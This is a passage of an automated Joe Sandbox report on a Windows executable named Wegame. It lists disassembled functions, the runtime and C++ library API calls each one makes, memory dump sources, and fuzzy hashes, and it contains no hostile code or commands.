                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 004489A8
                                                                • wcsrchr.VCRUNTIME140(?,0000005C,?,?,00000104), ref: 004489D1
                                                                • wcsrchr.VCRUNTIME140(?,0000002F,?,0000005C,?,?,00000104), ref: 004489E4
                                                                • wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000104), ref: 00448A0E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: wcsrchr$memsetwcsncpy
                                                                • String ID:
                                                                • API String ID: 1211469149-0
                                                                • Opcode ID: 56bd20eddc2baf1a415bf098aef1256dd22e35f9e3b4d275be152f42f4241699
                                                                • Instruction ID: 9796ee3e317ac412377fadb2602755f3b02f950aeb24f77496e2d39041889748
                                                                • Opcode Fuzzy Hash: 56bd20eddc2baf1a415bf098aef1256dd22e35f9e3b4d275be152f42f4241699
                                                                • Instruction Fuzzy Hash: 8B119372E01228ABEB109B698C49ADF77A8EF44344F0105BAFD19E3141EA74DE448BD5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046C46E Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C473
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C497
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C4B8
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C4CE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?pptr@?$basic_streambuf@
                                                                • String ID:
                                                                • API String ID: 2505503336-0
                                                                • Opcode ID: 5f7e83c0dc3ce28e442b5f1e5d2b82732947aaec302ea33683682515bc8a960a
                                                                • Instruction ID: f88bfc81a8ff2a0455a543fd08ae83bd471f4ee0ec9e235e194474fd7dbc32ed
                                                                • Opcode Fuzzy Hash: 5f7e83c0dc3ce28e442b5f1e5d2b82732947aaec302ea33683682515bc8a960a
                                                                • Instruction Fuzzy Hash: DC0129353006158F8720EF75D4E853AB7F6AF8931531005ABD88787B60EF75AC82DB49
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046ED30 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(004A8E7C,?,?,00434A9F,004A8FB0,0047C200), ref: 0046ED3A
                                                                • LeaveCriticalSection.KERNEL32(004A8E7C,?,?,00434A9F,004A8FB0,0047C200), ref: 0046ED6D
                                                                • SetEvent.KERNEL32(00000000,00434A9F,004A8FB0,0047C200), ref: 0046EDFB
                                                                • ResetEvent.KERNEL32 ref: 0046EE07
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalEventSection$EnterLeaveReset
                                                                • String ID:
                                                                • API String ID: 3553466030-0
                                                                • Opcode ID: 12c20c05a7fce37e45d367f1af3f908877814c4e294f9b26b21efa7311d7e6e7
                                                                • Instruction ID: 82cc7fe468890b1c92841a06a1b3443acaa272913f35601c46e93b07ced8e2d4
                                                                • Opcode Fuzzy Hash: 12c20c05a7fce37e45d367f1af3f908877814c4e294f9b26b21efa7311d7e6e7
                                                                • Instruction Fuzzy Hash: 46012136A10164DBCB049F64FC48A5A7BB9FB8A7457010079F50AD7321DBB46841CB8D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004641F9 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00464200
                                                                • ?get_exe_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,00000034,00463C26,00000000,00459F4F), ref: 00464223
                                                                • ?extract_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV34@@Z.COMMON(00000000,?,?,?,?,00000034,00463C26,00000000,00459F4F), ref: 00464231
                                                                • ?set_app_path@Application@common@ierd_tgp@@QAE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?), ref: 0046424A
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$Application@common@ierd_tgp@@D@2@@std@@$?extract_path@common@ierd_tgp@@?get_exe_path@?set_app_path@D@2@@std@@@H_prolog3_V34@@_invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 3206918494-0
                                                                • Opcode ID: 5e512fba2512de77e7e4558f96485afcb76f520b94eee5f3904a524e364b240e
                                                                • Instruction ID: 841a966e72a212c42cf2c14741d4d68cc202a4ad1f419adddbe6328684a267b9
                                                                • Opcode Fuzzy Hash: 5e512fba2512de77e7e4558f96485afcb76f520b94eee5f3904a524e364b240e
                                                                • Instruction Fuzzy Hash: 5BF069B0D01208DBCB04EFE6C4965DDBEB4AF14324F94016ED100A7282EA380B44CB6A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00418970 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00418978
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0041898A
                                                                • LeaveCriticalSection.KERNEL32(?,?,?), ref: 004189B0
                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?), ref: 004189B7
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$DeleteEnterLeavefree
                                                                • String ID:
                                                                • API String ID: 682159224-0
                                                                • Opcode ID: 6a9110b3f187f547b4708a9a4bf206c5f63a710d191e2e35642e88aaf699c20c
                                                                • Instruction ID: a4d21578c44c2e4c99c382ed94f3acd50e46d7eb7d0e08bf2bcd4887296ea9dd
                                                                • Opcode Fuzzy Hash: 6a9110b3f187f547b4708a9a4bf206c5f63a710d191e2e35642e88aaf699c20c
                                                                • Instruction Fuzzy Hash: 2BF01CB25112509BDB004F55EC8CF87BBB8EF86316F048065E9099B216C778D545CBB9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00448C3D Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(004A8070,004489C4,0044AEC3,?,?,?,00000000,?,0044AF52,?,?,004489C4,?,?,?,004489C4), ref: 00448C44
                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,0044AF52,?,?,004489C4,?,?,?,004489C4,?,?,00000104), ref: 00448C50
                                                                • GetModuleFileNameW.KERNEL32(00000000,004A8070,00000104,?,00000000,?,0044AF52,?,?,004489C4,?,?,?,004489C4,?,?), ref: 00448C5D
                                                                • wcsrchr.VCRUNTIME140(004A8070,0000005C,?,00000000,?,0044AF52,?,?,004489C4,?,?,?,004489C4,?,?,00000104), ref: 00448C66
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Module$FileHandleNamewcslenwcsrchr
                                                                • String ID:
                                                                • API String ID: 3944412705-0
                                                                • Opcode ID: 0fab44c20796cc1baa3ea20b881edbf809c3502ac4aa9dbe1560a90367dca190
                                                                • Instruction ID: d31ba45442d7d983dd0ab871aded12c0ed7912246ba8e0b4b96cdc8211c4341f
                                                                • Opcode Fuzzy Hash: 0fab44c20796cc1baa3ea20b881edbf809c3502ac4aa9dbe1560a90367dca190
                                                                • Instruction Fuzzy Hash: 93E08CA2A19622A6E61437797C09E8B266CCF17361701442AF209E21E0DE2888808AAC
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004201C0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 221COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041C6F0: memset.VCRUNTIME140(?,00000000,0000009C,?,?), ref: 0041C71D
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(list<T> too long,?,?,-00000005,85A35C35,?,?,00000001), ref: 004202D5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Xlength_error@std@@memset
                                                                • String ID: list<T> too long
                                                                • API String ID: 1527646195-4027344264
                                                                • Opcode ID: 1d221451c5be3388d507840dd5c7c14b09e3deb5c879aa9ec87217a755a40f66
                                                                • Instruction ID: 42c0510f35f0b3592187338cf6713bdc81878a347d9337629314492ee6fdedd4
                                                                • Opcode Fuzzy Hash: 1d221451c5be3388d507840dd5c7c14b09e3deb5c879aa9ec87217a755a40f66
                                                                • Instruction Fuzzy Hash: 75917A30600214DFDF14DF64D894BAA77B5BF09304F4881EAED09AB392D779AD84CB65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00422060 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 216COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,85A35C35,?,00000008), ref: 004220FF
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long), ref: 0042212F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Xlength_error@std@@_invalid_parameter_noinfo_noreturn
                                                                • String ID: map/set<T> too long
                                                                • API String ID: 2650047715-1285458680
                                                                • Opcode ID: f517c10762447d91f0b017253e659951dcef351b7edf8531ec5944aa41a5f626
                                                                • Instruction ID: c1fbfa865f54e5588b196296162fad693be7cd30b2cd29339b5682a893faff3e
                                                                • Opcode Fuzzy Hash: f517c10762447d91f0b017253e659951dcef351b7edf8531ec5944aa41a5f626
                                                                • Instruction Fuzzy Hash: 29912570600251EFD714CF19D688A25FBE1BF49314B59C19AE80D8B762C7BAEC91CB98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0044063B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 202COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?,?,map/set<T> too long,?,?,?,?,map/set<T> too long,?), ref: 00440757
                                                                • __EH_prolog3_catch.LIBCMT ref: 00440764
                                                                  • Part of subcall function 0043FAD1: __EH_prolog3_catch.LIBCMT ref: 0043FAD8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_catch$Xlength_error@std@@
                                                                • String ID: map/set<T> too long
                                                                • API String ID: 33345211-1285458680
                                                                • Opcode ID: 4704d268f2c37fa741d867ca046f638bd67b28e33b53acfe8658886411b6453f
                                                                • Instruction ID: afd2164a58a6c9bec976088cf5e38ab9c21ff854378e74fdb3f1a8d99670b01b
                                                                • Opcode Fuzzy Hash: 4704d268f2c37fa741d867ca046f638bd67b28e33b53acfe8658886411b6453f
                                                                • Instruction Fuzzy Hash: 6E819C70600201DFEB15DF19C580E6ABBE1BF45314F19C49AEA0A9B392C779EC61CF96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00414860 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00414BBE,?,85A35C35,?,?,?,85A35C35,?,?), ref: 004148C1
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,00414BBE,?,85A35C35,?,?,?,85A35C35,?,?), ref: 004148EF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Xlength_error@std@@_invalid_parameter_noinfo_noreturn
                                                                • String ID: map/set<T> too long
                                                                • API String ID: 2650047715-1285458680
                                                                • Opcode ID: a8e22fc882cdc43241d8f13cd7bb0566ad8371664b576709492693c13a1e438a
                                                                • Instruction ID: 6db4abedde4951eed31b35fdc3271801658bd68ac38e9dc3a19d05cb82b0a9b2
                                                                • Opcode Fuzzy Hash: a8e22fc882cdc43241d8f13cd7bb0566ad8371664b576709492693c13a1e438a
                                                                • Instruction Fuzzy Hash: 2B7125B46102418FC714CF29C588A56FBE1BF89324B29C59AE44D8B762D739EC82CB58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00470BD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FormatMessageA.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,85A35C35), ref: 00470C21
                                                                • LocalFree.KERNEL32(00000000,00000000,00000001), ref: 00470D6B
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 0040C810: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP140(invalid string position,00402121), ref: 0040C815
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: FormatFreeLocalMessageXout_of_range@std@@memmove
                                                                • String ID: Unknown error
                                                                • API String ID: 2313771647-83687255
                                                                • Opcode ID: 93a52ca1d66e286124033c2f422d3fe1c64fbeeab1aabda40ff4a79c7f6bf718
                                                                • Instruction ID: 0e7926aeaf2013e944b329ae5d46a0f8ebb18510ede36a25308e8cf1e1ac7263
                                                                • Opcode Fuzzy Hash: 93a52ca1d66e286124033c2f422d3fe1c64fbeeab1aabda40ff4a79c7f6bf718
                                                                • Instruction Fuzzy Hash: B151AA70A00249DFDB15CFA8C854BEEBBF5EF48314F24811ED805B7681D775AA85CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00446395 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0044639F
                                                                  • Part of subcall function 00441EDA: __EH_prolog3.LIBCMT ref: 00441EE1
                                                                • _Copy_construct_from.LIBCPMT ref: 004464D5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                • Opcode ID: a7eea06ed8977ef245e8d29be52daa111e87faab82f9f86e4bf310ccb4cb6270
                                                                • Instruction ID: 5d79cb9a261da551ae140a48fd2b8a0fb69bcaee62f09f1b287ec12dea9ddd69
                                                                • Opcode Fuzzy Hash: a7eea06ed8977ef245e8d29be52daa111e87faab82f9f86e4bf310ccb4cb6270
                                                                • Instruction Fuzzy Hash: D541F971900248DFDF14EB61C855BEEBBB1AF19308F5480DEE049A7282DB785F48CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0044652B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00446535
                                                                  • Part of subcall function 00441DD5: __EH_prolog3.LIBCMT ref: 00441DDC
                                                                • _Copy_construct_from.LIBCPMT ref: 0044666B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
                                                                • Opcode ID: 9e0e323e152029e24241ec39e9098e1020a788dccce10045ec3af32964021c1d
                                                                • Instruction ID: 8d8fe167cc9ba15d928d21e10be77419f113e6850780e2df5bdd028080f1a992
                                                                • Opcode Fuzzy Hash: 9e0e323e152029e24241ec39e9098e1020a788dccce10045ec3af32964021c1d
                                                                • Instruction Fuzzy Hash: B241FA70900258DFDF14EB61C855BEEBBB1AF19308F5480DEE045A7292DB785F48CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004466C1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004466CB
                                                                  • Part of subcall function 00442031: __EH_prolog3.LIBCMT ref: 00442038
                                                                • _Copy_construct_from.LIBCPMT ref: 00446801
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Copy_construct_fromH_prolog3H_prolog3_
                                                                • String ID: seq_num_
                                                                • API String ID: 1758982211-1175117602
